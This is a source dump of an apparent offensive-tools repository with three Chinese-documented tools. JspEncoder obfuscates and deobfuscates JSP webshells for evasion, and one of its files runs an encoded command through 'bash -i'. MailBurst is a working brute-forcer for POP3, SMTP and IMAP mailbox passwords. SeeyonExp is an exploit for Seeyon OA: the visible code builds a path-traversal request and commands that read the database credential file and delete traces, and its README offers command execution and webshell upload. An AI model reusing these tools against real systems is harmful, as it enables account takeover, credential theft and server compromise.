├── JspEncoder
├── README.md
├── pom.xml
└── src
│ └── main
│ ├── java
│ ├── cDataDecodeJspx.java
│ ├── cDataEncodeJspx.java
│ ├── classIn.java
│ ├── classOut.java
│ ├── decoderJsp.java
│ ├── encoderJsp.java
│ ├── htmlDecodeJspx.java
│ ├── htmlEncodeJspx.java
│ └── main.java
│ └── resources
│ └── META-INF
│ └── MANIFEST.MF
├── MailBurst
├── MailBrust.py
├── README.md
└── lib
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── __pycache__
│ ├── __init__.cpython-38.pyc
│ ├── imapBrust.cpython-38.pyc
│ ├── imapsBrust.cpython-38.pyc
│ ├── pop3Brust.cpython-38.pyc
│ ├── pop3sBurst.cpython-38.pyc
│ ├── smtpBurst.cpython-38.pyc
│ └── smtpsBrust.cpython-38.pyc
│ ├── imapBrust.py
│ ├── imapsBrust.py
│ ├── pop3Brust.py
│ ├── pop3sBurst.py
│ ├── smtpBurst.py
│ └── smtpsBrust.py
├── PIC
└── BkG.jpg
├── README.md
└── SeeyonExp
├── README.md
├── pom.xml
├── src
├── META-INF
│ └── MANIFEST.MF
└── main
│ ├── META-INF
│ └── MANIFEST.MF
│ └── java
│ ├── DataConf.java
│ ├── Decoder.java
│ ├── Encoder.java
│ ├── ExecuteCode.java
│ ├── ExpMain.java
│ ├── HTTPClient.java
│ ├── JsonRead.java
│ ├── SSLClient.java
│ ├── Scanner.java
│ ├── UploadShell.java
│ └── VersionRecognition.java
└── vul.json
/JspEncoder/README.md:
--------------------------------------------------------------------------------
1 | # JspEncoder
2 |
3 | ### 0x00 开发日志
4 |
5 | 2020-11-16 V0.2 支持Jspx下HTML、CDATA实体编码
6 |
7 | 2020-11-6 V0.1 根据野外落地畸形unicode内存马判断编码方式,支持畸形unicode加解密
8 |
9 | ### 0x01 使用方法
10 |
11 | Jsp文件Unicode解码:java -jar JspEncoder.jar UniDe srcFile desFile
12 |
13 | Jsp文件Unicode编码:java -jar JspEncoder.jar UniEn srcFile desFile
14 |
15 | Jspx文件Html解码:java -jar JspEncoder.jar HtmlDe srcFile desFile
16 |
17 | Jspx文件Html编码:java -jar JspEncoder.jar HtmlEn srcFile desFile
18 |
19 | Jspx文件CDATA解码:java -jar JspEncoder.jar CdataDe srcFile desFile
20 |
21 | Jspx文件CDATA编码:java -jar JspEncoder.jar CdataEn srcFile desFile
22 |
23 | Base64文件输出为class文件:java -jar JspEncoder.jar ClassOut srcFile desFile
24 |
25 | class文件输出为Base64文件:java -jar JspEncoder.jar ClassIn srcFile desFile
26 |
27 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
28 |
29 | ### 0x02 注意事项
30 |
31 | 在进行Unicode编码时请去掉jsp文件的类声明和引入声明模块,否则jsp文件将无法运行
32 |
--------------------------------------------------------------------------------
/JspEncoder/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | org.example
8 | JspEncoder
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | org.apache.maven.plugins
14 | maven-compiler-plugin
15 |
16 | 8
17 | 8
18 |
19 |
20 |
21 |
22 |
23 |
24 | org.jdom
25 | jdom
26 | 2.0.2
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/cDataDecodeJspx.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | public class cDataDecodeJspx {
4 | public cDataDecodeJspx(String srcFile,String desFile) throws IOException {
5 | File fileIn = new File(srcFile);
6 | FileInputStream fis = new FileInputStream(fileIn);
7 | InputStreamReader streamReader = new InputStreamReader(fis);
8 | BufferedReader bufread = new BufferedReader(streamReader);
9 | String line;
10 | StringBuilder strB = new StringBuilder();
11 | while ((line = bufread.readLine())!=null){
12 | strB.append(line);
13 | }
14 | streamReader.close();
15 | bufread.close();
16 | String strRes = String.valueOf(strB);
17 | strRes = strRes.replaceAll("","");
19 | File f = new File(desFile);
20 | FileWriter writer = new FileWriter(f);
21 | writer.write("");
22 | writer.write(strRes);
23 | writer.close();
24 | System.out.println("目标文件输出至" + desFile);
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/cDataEncodeJspx.java:
--------------------------------------------------------------------------------
1 | import org.jdom2.Document;
2 | import org.jdom2.Element;
3 | import org.jdom2.JDOMException;
4 | import org.jdom2.Namespace;
5 | import org.jdom2.input.SAXBuilder;
6 | import org.jdom2.output.XMLOutputter;
7 | import org.xml.sax.InputSource;
8 |
9 | import java.io.*;
10 | import java.util.List;
11 |
12 | public class cDataEncodeJspx {
13 | public cDataEncodeJspx(String srcFile,String desFile) throws IOException, JDOMException {
14 | SAXBuilder sb = new SAXBuilder();
15 | Document doc = sb.build(new FileInputStream(srcFile));
16 | Element root = doc.getRootElement();
17 | Namespace namespace = root.getNamespace();
18 | List list = root.getChildren("scriptlet",namespace);
19 | String result = "";
20 | for (int i=0;i";
26 | }
27 | element.setText(result);
28 | }
29 | List list1 = root.getChildren("declaration",namespace);
30 | result = "";
31 | for (int i=0;i";
37 | }
38 | element.setText(result);
39 | }
40 | XMLOutputter outputter = new XMLOutputter();
41 | outputter.output(doc,new FileOutputStream(desFile));
42 | File fileIn = new File(desFile);
43 | FileInputStream fis = new FileInputStream(fileIn);
44 | InputStreamReader streamReader = new InputStreamReader(fis);
45 | BufferedReader bufread = new BufferedReader(streamReader);
46 | String line;
47 | StringBuilder strB = new StringBuilder();
48 | while ((line = bufread.readLine())!=null){
49 | strB.append(line);
50 | }
51 | streamReader.close();
52 | bufread.close();
53 | String strRes = String.valueOf(strB);
54 | strRes = strRes.replaceAll("<","<");
55 | strRes = strRes.replaceAll(">",">");
56 | File f = new File(desFile);
57 | FileWriter writer = new FileWriter(f);
58 | writer.write("");
59 | writer.write(strRes);
60 | writer.close();
61 | System.out.println("[!]文件编码完成,已输出至" + desFile);
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/classIn.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.util.Base64;
3 |
4 | public class classIn {
5 | public classIn(String srcFile, String desFile) throws IOException, InterruptedException {
6 | if (System.getProperties().getProperty("os.name").startsWith("win")||System.getProperties().getProperty("os.name").startsWith("Win")){
7 | Runtime.getRuntime().exec("cmd /c" + "certutil -f -encode" + " " +srcFile + " " +desFile);
8 | Thread.sleep(3*1000);
9 | BufferedReader in = new BufferedReader(new FileReader(desFile));
10 | String str = "";
11 | String result = "";
12 | while ((str = in.readLine())!=null){
13 | result = result + str;
14 | }
15 | in.close();
16 | result = result.replaceAll("\\\\r","");
17 | result = result.replaceAll("\\\\n","");
18 | result = result.replace("-----BEGIN CERTIFICATE-----","");
19 | result = result.replace("-----END CERTIFICATE-----","");
20 | File file = new File(desFile);
21 | FileWriter fileWriter = new FileWriter(file);
22 | BufferedWriter bw = new BufferedWriter(fileWriter);
23 | bw.write(result);
24 | bw.close();
25 | fileWriter.close();
26 | System.out.println("[!]文件已base64编码到" + desFile);
27 | }else {
28 | String execString = "cat " + srcFile +" |base64 >" +desFile;
29 | byte[] execByte = execString.getBytes();
30 | String execBase = Base64.getEncoder().encodeToString(execByte);
31 | Runtime.getRuntime().exec("bash -c {echo," + execBase.trim()+ "}|{base64,-d}|{bash,-i}");
32 | System.out.println("[!]文件已base64编码到" + desFile);
33 | }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/classOut.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.lang.reflect.InvocationTargetException;
3 |
4 | class classOut {
5 | public classOut(String srcFile,String desFile) throws ClassNotFoundException, NoSuchMethodException, IOException, InvocationTargetException, IllegalAccessException {
6 | FileInputStream fis = new FileInputStream(srcFile); //文件输入流
7 | InputStreamReader isr = new InputStreamReader(fis); //输入流读取器
8 | BufferedReader br = new BufferedReader(isr);
9 | String line = "";
10 | String text = "";
11 | while ((line = br.readLine())!= null){
12 | text = text + line;
13 | }
14 | ClassLoader clzLoader = Thread.currentThread().getContextClassLoader();
15 | byte[] bytecode = null;
16 | Class base64Clz = clzLoader.loadClass("java.util.Base64");
17 | Class decoderClz = clzLoader.loadClass("java.util.Base64$Decoder");
18 | Object decoder = base64Clz.getMethod("getDecoder").invoke(base64Clz);
19 | bytecode = (byte[]) decoderClz.getMethod("decode", String.class).invoke(decoder, text);
20 | OutputStream out = new FileOutputStream(desFile);
21 | InputStream is = new ByteArrayInputStream(bytecode);
22 | byte[] buff = new byte[1024];
23 | int len = 0;
24 | while ((len = is.read(buff)) != -1){
25 | out.write(buff,0,len);
26 | }
27 | is.close();
28 | out.close();
29 | System.out.println("[!]Class文件已输出至" + desFile);
30 | }
31 |
32 | }
33 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/decoderJsp.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 | import java.math.BigInteger;
3 | public class decoderJsp {
4 | public decoderJsp(String srcFile, String desFile) throws IOException {
5 | FileInputStream fis = new FileInputStream(srcFile); //文件输入流
6 | InputStreamReader isr = new InputStreamReader(fis); //输入流读取器
7 | BufferedReader br = new BufferedReader(isr);
8 | String line = "";
9 | String text = "";
10 | while ((line = br.readLine())!= null){
11 | text = text + line;
12 | }
13 | String regex = "\\\\u+";
14 | String result = text.replaceAll(regex,"\\\\u");
15 | String[] split = result.split("\\\\u");
16 | String result1 = "";
17 | for (int i=0;i";
40 | FileWriter writer = new FileWriter(desFile);
41 | writer.write("");
42 | writer.write(result);
43 | writer.flush();
44 | writer.close();
45 | System.out.println("[!]文件编码完成,已输出至" + desFile);
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/JspEncoder/src/main/java/htmlDecodeJspx.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | public class htmlDecodeJspx {
4 | public htmlDecodeJspx(String srcFile,String desFile) throws IOException {
5 | File fileIn = new File(srcFile);
6 | FileInputStream fis = new FileInputStream(fileIn);
7 | InputStreamReader streamReader = new InputStreamReader(fis);
8 | BufferedReader bufread = new BufferedReader(streamReader);
9 | String line;
10 | StringBuilder strB = new StringBuilder();
11 | while ((line = bufread.readLine())!=null){
12 | strB.append(line);
13 | }
14 | streamReader.close();
15 | bufread.close();
16 | String strRes = String.valueOf(strB);
17 | String result = "";
18 | String nowStr = "";
19 | String[] valueArray = strRes.split("&");
20 | for (int i=0;i 可选参数为:")
11 | print("\n\t 暴破格式:python MailBrust.py pop.qq.com POP3 username.txt password.txt 110")
12 | print("\n\t 最后的端口参数取决于邮箱服务器,110为任意端口值,可以进行修改")
13 | sys.exit(1)
14 | protocolDict = {'POP3': 110, 'SMTP': 25, 'IMAP': 143, 'POP3S': 995, 'SMTPS': 465, 'IMAPS': 993}
15 | mailAddr = sys.argv[1]
16 | mailProt = sys.argv[2]
17 | mailPort = protocolDict[mailProt]
18 | if len(sys.argv) == 6:
19 | mailPort = int(sys.argv[5])
20 | try:
21 | userLines = open(sys.argv[3], "r").readlines()
22 | except(IOError):
23 | print("[-]错误信息:请检查文件路径\n")
24 | try:
25 | passLines = open(sys.argv[4], "r").readlines()
26 | except(IOError):
27 | print("[-]错误信息:请检查文件路径\n")
28 | if sys.argv[2] == "POP3":
29 | pop3Thread = pop3Brust.pop3Brust(mailAddr, mailPort, userLines, passLines)
30 | pop3Thread.start()
31 | pop3Thread.join()
32 | print("[-]提示信息:破解完毕")
33 | if sys.argv[2] == "POP3S":
34 | pop3sThread = pop3sBurst.pop3sBrust(mailAddr, mailPort, userLines, passLines)
35 | pop3sThread.start()
36 | pop3sThread.join()
37 | print("[-]提示信息:破解完毕")
38 | if sys.argv[2] == "SMTP":
39 | smtpThread = smtpBurst.smtpBurst(mailAddr, mailPort, userLines, passLines)
40 | smtpThread.start()
41 | smtpThread.join()
42 | print("[-]提示信息:破解完毕")
43 | if sys.argv[2] == "SMTPS":
44 | smtpsThread = smtpsBrust.smtpsBurst(mailAddr, mailPort, userLines, passLines)
45 | smtpsThread.start()
46 | smtpsThread.join()
47 | print("[-]提示信息:破解完毕")
48 | if sys.argv[2] == "IMAP":
49 | imapThread = imapBrust.imapBrust(mailAddr, mailPort, userLines, passLines)
50 | imapThread.start()
51 | imapThread.join()
52 | print("[-]提示信息:破解完毕")
53 | if sys.argv[2] == "IMAPS":
54 | imapsThread = imapsBrust.imapsBrust(mailAddr, mailPort, userLines, passLines)
55 | imapsThread.start()
56 | imapsThread.join()
57 | print("[-]提示信息:破解完毕")
58 | if __name__ == '__main__':
59 | start()
--------------------------------------------------------------------------------
/MailBurst/README.md:
--------------------------------------------------------------------------------
1 | # MailBrust
2 |
3 | ### 0x00 开发日志
4 |
5 | 2020-8-13 V0.2 增加多线程异步
6 |
7 | 2020-8-11 V0.1 单线程全协议邮箱用户名密码暴力破解
8 |
9 | ### 0x01 使用方法
10 |
11 | POP3协议暴力破解:python MailBrust.py xxx.com POP3 username.txt password.txt
12 |
13 | POP3S协议暴力破解:python MailBrust.py xxx.com POP3S username.txt password.txt
14 |
15 | SMTP协议暴力破解:python MailBrust.py xxx.com SMTP username.txt password.txt
16 |
17 | SMTPS协议暴力破解:python MailBrust.py xxx.com SMTPS username.txt password.txt
18 |
19 | IMAP协议暴力破解:python MailBrust.py xxx.com IMAP username.txt password.txt
20 |
21 | IMAPS协议暴力破解:python MailBrust.py xxx.com IMAPS username.txt password.txt
22 |
23 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
24 |
--------------------------------------------------------------------------------
/MailBurst/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.py
--------------------------------------------------------------------------------
/MailBurst/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__init__.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/imapsBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3Brust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/pop3sBurst.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpBurst.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/MailBurst/lib/__pycache__/smtpsBrust.cpython-38.pyc
--------------------------------------------------------------------------------
/MailBurst/lib/imapBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import imaplib
3 | import threading
4 | import asyncio
5 |
6 | class imapBrust(threading.Thread):
7 | def __init__(self,mailAddr, mailPort, userLines,passLines):
8 | threading.Thread.__init__(self)
9 | self.mailAddr = mailAddr
10 | self.mailPort = mailPort
11 | self.userLines = userLines
12 | self.passLines = passLines
13 | def run(self):
14 | try:
15 | imaplib.IMAP4(self.mailAddr, self.mailPort)
16 | except:
17 | print("[-]错误信息:服务器错误!")
18 | return 1
19 | if len(self.userLines) < 1 or len(self.passLines) < 1:
20 | print("[-]错误信息:字典文件中无内容,请检查!")
21 | return 1
22 | for index in range(len(self.userLines)):
23 | for i in range(len(self.passLines)):
24 | threadLock.acquire()
25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index],self.passLines[i]))
26 | threadLock.release()
27 | continue
28 | async def login(mailAddr,mailPort,username,password):
29 | try:
30 | username = username.replace("\n", "")
31 | password = password.replace("\n", "")
32 | imapServer = imaplib.IMAP4(mailAddr, mailPort)
33 | imapServer.login(username, password)
34 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
35 | except:
36 | try:
37 | username = username.replace("\n", "")
38 | password = password.replace("\n", "")
39 | imapServer = await imaplib.IMAP4(mailAddr, mailPort)
40 | imapServer.login_cram_md5(username, password)
41 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
42 | except:
43 | print("[-]错误信息:密码错误!")
44 | threadLock = threading.Lock()
45 | loop = asyncio.get_event_loop()
--------------------------------------------------------------------------------
/MailBurst/lib/imapsBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import imaplib
3 | import threading
4 | import asyncio
5 |
6 | class imapsBrust(threading.Thread):
7 | def __init__(self,mailAddr, mailPort, userLines, passLines):
8 | threading.Thread.__init__(self)
9 | self.mailAddr = mailAddr
10 | self.mailPort = mailPort
11 | self.userLines = userLines
12 | self.passLines = passLines
13 | def run(self):
14 | try:
15 | imaplib.IMAP4_SSL(self.mailAddr, self.mailPort)
16 | except:
17 | print("[-]错误信息:服务器错误!")
18 | return 1
19 | if len(self.userLines) < 1 or len(self.passLines) < 1:
20 | print("[-]错误信息:字典文件中无内容,请检查!")
21 | return 1
22 | for index in range(len(self.userLines)):
23 | for i in range(len(self.passLines)):
24 | threadLock.acquire()
25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i]))
26 | threadLock.release()
27 | continue
28 | async def login(mailAddr,mailPort,username,password):
29 | try:
30 | username = username.replace("\n", "")
31 | password = password.replace("\n", "")
32 | imapServer = imaplib.IMAP4_SSL(mailAddr, mailPort)
33 | imapServer.login(username, password)
34 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
35 | except:
36 | try:
37 | username = username.replace("\n", "")
38 | password = password.replace("\n", "")
39 | imapServer = await imaplib.IMAP4_SSL(mailAddr, mailPort)
40 | imapServer.login_cram_md5(username, password)
41 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
42 | except:
43 | print("[-]错误信息:密码错误!")
44 | threadLock = threading.Lock()
45 | loop = asyncio.get_event_loop()
--------------------------------------------------------------------------------
/MailBurst/lib/pop3Brust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import poplib
3 | import threading
4 | import asyncio
5 |
6 | class pop3Brust(threading.Thread):
7 | def __init__(self,mailAddr, mailPort, userLines, passLines):
8 | threading.Thread.__init__(self)
9 | self.mailAddr = mailAddr
10 | self.mailPort = mailPort
11 | self.userLines = userLines
12 | self.passLines = passLines
13 | def run(self):
14 | try:
15 | poplib.POP3(self.mailAddr, self.mailPort)
16 | except:
17 | print("[-]错误信息:服务器错误!")
18 | return 1
19 | if len(self.userLines) < 1 or len(self.passLines) < 1:
20 | print("[-]错误信息:字典文件中无内容,请检查!")
21 | return 1
22 | for index in range(len(self.userLines)):
23 | for i in range(len(self.passLines)):
24 | threadLock.acquire()
25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i]))
26 | threadLock.release()
27 | continue
28 | async def login(mailAddr,mailPort,username,password):
29 | try:
30 | username = username.replace("\n", "")
31 | password = password.replace("\n", "")
32 | pop3Server = await poplib.POP3(mailAddr, mailPort)
33 | pop3Server.user(username)
34 | pop3Server.pass_(password)
35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
36 | except:
37 | print("[-]错误信息:密码错误!")
38 | threadLock = threading.Lock()
39 | loop = asyncio.get_event_loop()
--------------------------------------------------------------------------------
/MailBurst/lib/pop3sBurst.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import poplib
3 | import threading
4 | import asyncio
5 |
6 | class pop3sBrust(threading.Thread):
7 | def __init__(self,mailAddr, mailPort, userLines, passLines):
8 | threading.Thread.__init__(self)
9 | self.mailAddr = mailAddr
10 | self.mailPort = mailPort
11 | self.userLines = userLines
12 | self.passLines = passLines
13 | def run(self):
14 | try:
15 | poplib.POP3_SSL(self.mailAddr, self.mailPort)
16 | except:
17 | print("[-]错误信息:服务器错误!")
18 | return 1
19 | if len(self.userLines) < 1 or len(self.passLines) < 1:
20 | print("[-]错误信息:字典文件中无内容,请检查!")
21 | return 1
22 | for index in range(len(self.userLines)):
23 | for i in range(len(self.passLines)):
24 | threadLock.acquire()
25 | loop.run_until_complete(login(self.mailAddr,self.mailPort, self.userLines[index], self.passLines[i]))
26 | threadLock.release()
27 | continue
28 | async def login(mailAddr,mailPort,username,password):
29 | try:
30 | username = username.replace("\n", "")
31 | password = password.replace("\n", "")
32 | pop3Server = await poplib.POP3_SSL(mailAddr, mailPort)
33 | pop3Server.user(username)
34 | pop3Server.pass_(password)
35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
36 | except:
37 | print("[-]错误信息:密码错误!")
38 | threadLock = threading.Lock()
39 | loop = asyncio.get_event_loop()
--------------------------------------------------------------------------------
/MailBurst/lib/smtpBurst.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import smtplib
3 | import threading
4 | import asyncio
5 | import time
6 |
7 |
8 | class smtpBurst(threading.Thread):
9 | def __init__(self, mailAddr, mailPort, userLines, passLines):
10 | threading.Thread.__init__(self)
11 | self.mailAddr = mailAddr
12 | self.mailPort = mailPort
13 | self.userLines = userLines
14 | self.passLines = passLines
15 |
16 | def run(self):
17 | try:
18 | smtplib.SMTP(self.mailAddr, self.mailPort)
19 | except:
20 | print("[-]错误信息:服务器错误!")
21 | return 1
22 | if len(self.userLines) < 1 or len(self.passLines) < 1:
23 | print("[-]错误信息:字典文件中无内容,请检查!")
24 | return 1
25 | for index in range(len(self.userLines)):
26 | for i in range(len(self.passLines)):
27 | threadLock.acquire()
28 | loop.run_until_complete(login(self.mailAddr, self.mailPort, self.userLines[index], self.passLines[i]))
29 | threadLock.release()
30 | continue
31 |
32 |
33 | async def login(mailAddr, mailPort, username, password):
34 | try:
35 | username = username.replace("\n", "")
36 | password = password.replace("\n", "")
37 | smtpServer = await smtplib.SMTP(mailAddr, mailPort)
38 | smtpServer.login(username, password)
39 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
40 | except:
41 | print("[-]错误信息:密码错误!")
42 |
43 |
44 | threadLock = threading.Lock()
45 | loop = asyncio.get_event_loop()
46 |
--------------------------------------------------------------------------------
/MailBurst/lib/smtpsBrust.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import smtplib
3 | import threading
4 | import asyncio
5 |
6 | class smtpsBurst(threading.Thread):
7 | def __init__(self, mailAddr, mailPort, userLines, passLines):
8 | threading.Thread.__init__(self)
9 | self.mailAddr = mailAddr
10 | self.mailPort = mailPort
11 | self.userLines = userLines
12 | self.passLines = passLines
13 | def run(self):
14 | try:
15 | smtplib.SMTP_SSL(self.mailAddr, self.mailPort)
16 | except:
17 | print("[-]错误信息:服务器错误!")
18 | return 1
19 | if len(self.userLines) < 1 or len(self.passLines) < 1:
20 | print("[-]错误信息:字典文件中无内容,请检查!")
21 | return 1
22 | for index in range(len(self.userLines)):
23 | for i in range(len(self.passLines)):
24 | threadLock.acquire()
25 | loop.run_until_complete(login(self.mailAddr, self.mailPort, self.userLines[index], self.passLines[i]))
26 | threadLock.release()
27 | continue
28 |
29 | async def login(mailAddr, mailPort, username, password):
30 | try:
31 | username = username.replace("\n", "")
32 | password = password.replace("\n", "")
33 | smtpServer = await smtplib.SMTP_SSL(mailAddr, mailPort)
34 | smtpServer.login(username, password)
35 | print("[-]密码正确" + "账户名:" + username + "密码:" + password)
36 | except:
37 | print("[-]错误信息:密码错误!")
38 | threadLock = threading.Lock()
39 | loop = asyncio.get_event_loop()
--------------------------------------------------------------------------------
/PIC/BkG.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TimelineSec/ATTCK-Tools-library/b500087c3b5092f1632169e574366b7cd9a86902/PIC/BkG.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ATT-CK-Tools-library
2 |
3 | 
4 |
5 | # 声明
6 | 本项目工具仅供测试使用,请勿用于违法用途,否则后果自负!
7 |
--------------------------------------------------------------------------------
/SeeyonExp/README.md:
--------------------------------------------------------------------------------
1 | # SeeyonExp
2 |
3 | ### 0x00 开发日志
4 |
5 | 2021-3-13 V0.9 增加多个受影响版本,修复HTTPS无法指定端口bug
6 |
7 | 2021-2-2 V0.8 新增影响版本v6.1
8 |
9 | 2021-1-10 V0.7 增加识别版本后无损检测漏洞功能,有那么点漏扫的意思
10 |
11 | 2020-11-11 V0.6 增加数据库配置文件读取功能
12 |
13 | 2020-11-10 V0.5 增加回显流量加密功能,Base64与ascii结合,Base65
14 |
15 | 2020-11-2 V0.4 解决命令执行for循环无法执行for之后Java代码的bug,分号的神奇作用
16 |
17 | 2020-10-30 V0.3 增加文件上传功能,Base64不编码写入不了,黑名单校验
18 |
19 | 2020-10-22 V0.2 命令可以在windows与Linux下执行,并支持https
20 |
21 | 2020-10-20 V0.1 根据POC写出初步利用,可以执行命令,但是仅在windows与http下
22 |
23 | ### 0x01 使用方法
24 |
25 | 无损检验是否存在漏洞:java -jar seeyon.jar scan http/https://xxxx.com:port/seeyon
26 |
27 | 执行命令:java -jar seeyon.jar http/https://xxxx.com:port/seeyon cmd
28 |
29 | 写入shell:java -jar seeyon.jar http/https://xxxx.com:port/seeyon shell srcFile desFile
30 |
31 | 读取数据库配置文件:java -jar seeyon.jar http/https://xxxx.com:port/seeyon dataConf
32 |
33 | 流量解码:java -jar seeyon.jar decode ciphertext
34 |
35 | 流量编码:java -jar seeyon.jar encode Plaintext
36 |
37 | 使用参考:https://mp.weixin.qq.com/s/NKksirrM5Zg5BGCu4fY8LQ
38 |
--------------------------------------------------------------------------------
/SeeyonExp/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | groupId
8 | Seeyon
9 | 1.0-SNAPSHOT
10 |
11 |
12 |
13 | org.apache.maven.plugins
14 | maven-compiler-plugin
15 |
16 | 7
17 | 7
18 |
19 |
20 |
21 |
22 |
23 |
24 | commons-codec
25 | commons-codec
26 | 1.15
27 |
28 |
29 | org.apache.httpcomponents
30 | httpclient
31 | 4.5.13
32 |
33 |
34 | org.json
35 | json
36 | 20180813
37 |
38 |
39 |
--------------------------------------------------------------------------------
/SeeyonExp/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: ExpMain
3 |
4 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: ExpMain
3 |
4 |
--------------------------------------------------------------------------------
/SeeyonExp/src/main/java/DataConf.java:
--------------------------------------------------------------------------------
1 | import java.util.UUID;
2 |
3 | public class DataConf {
4 | public void DataConf(String oaUrl) throws Exception {
5 | HTTPClient httpClient = new HTTPClient();
6 | String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip";
7 | UUID uuid = UUID.randomUUID();
8 | String uuidStr = uuid.toString();
9 | uuidStr = uuidStr.replace("-", "");
10 | String getUrl = oaUrl + "/" + uuidStr + ".txt";
11 | String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt";
12 | String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt";
13 | String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt";
14 | String winReadDadaConf = "cd ../../base/conf & type datasourceCtp.properties";
15 | String linReadDadaConf = "cat ../../base/conf/datasourceCtp.properties";
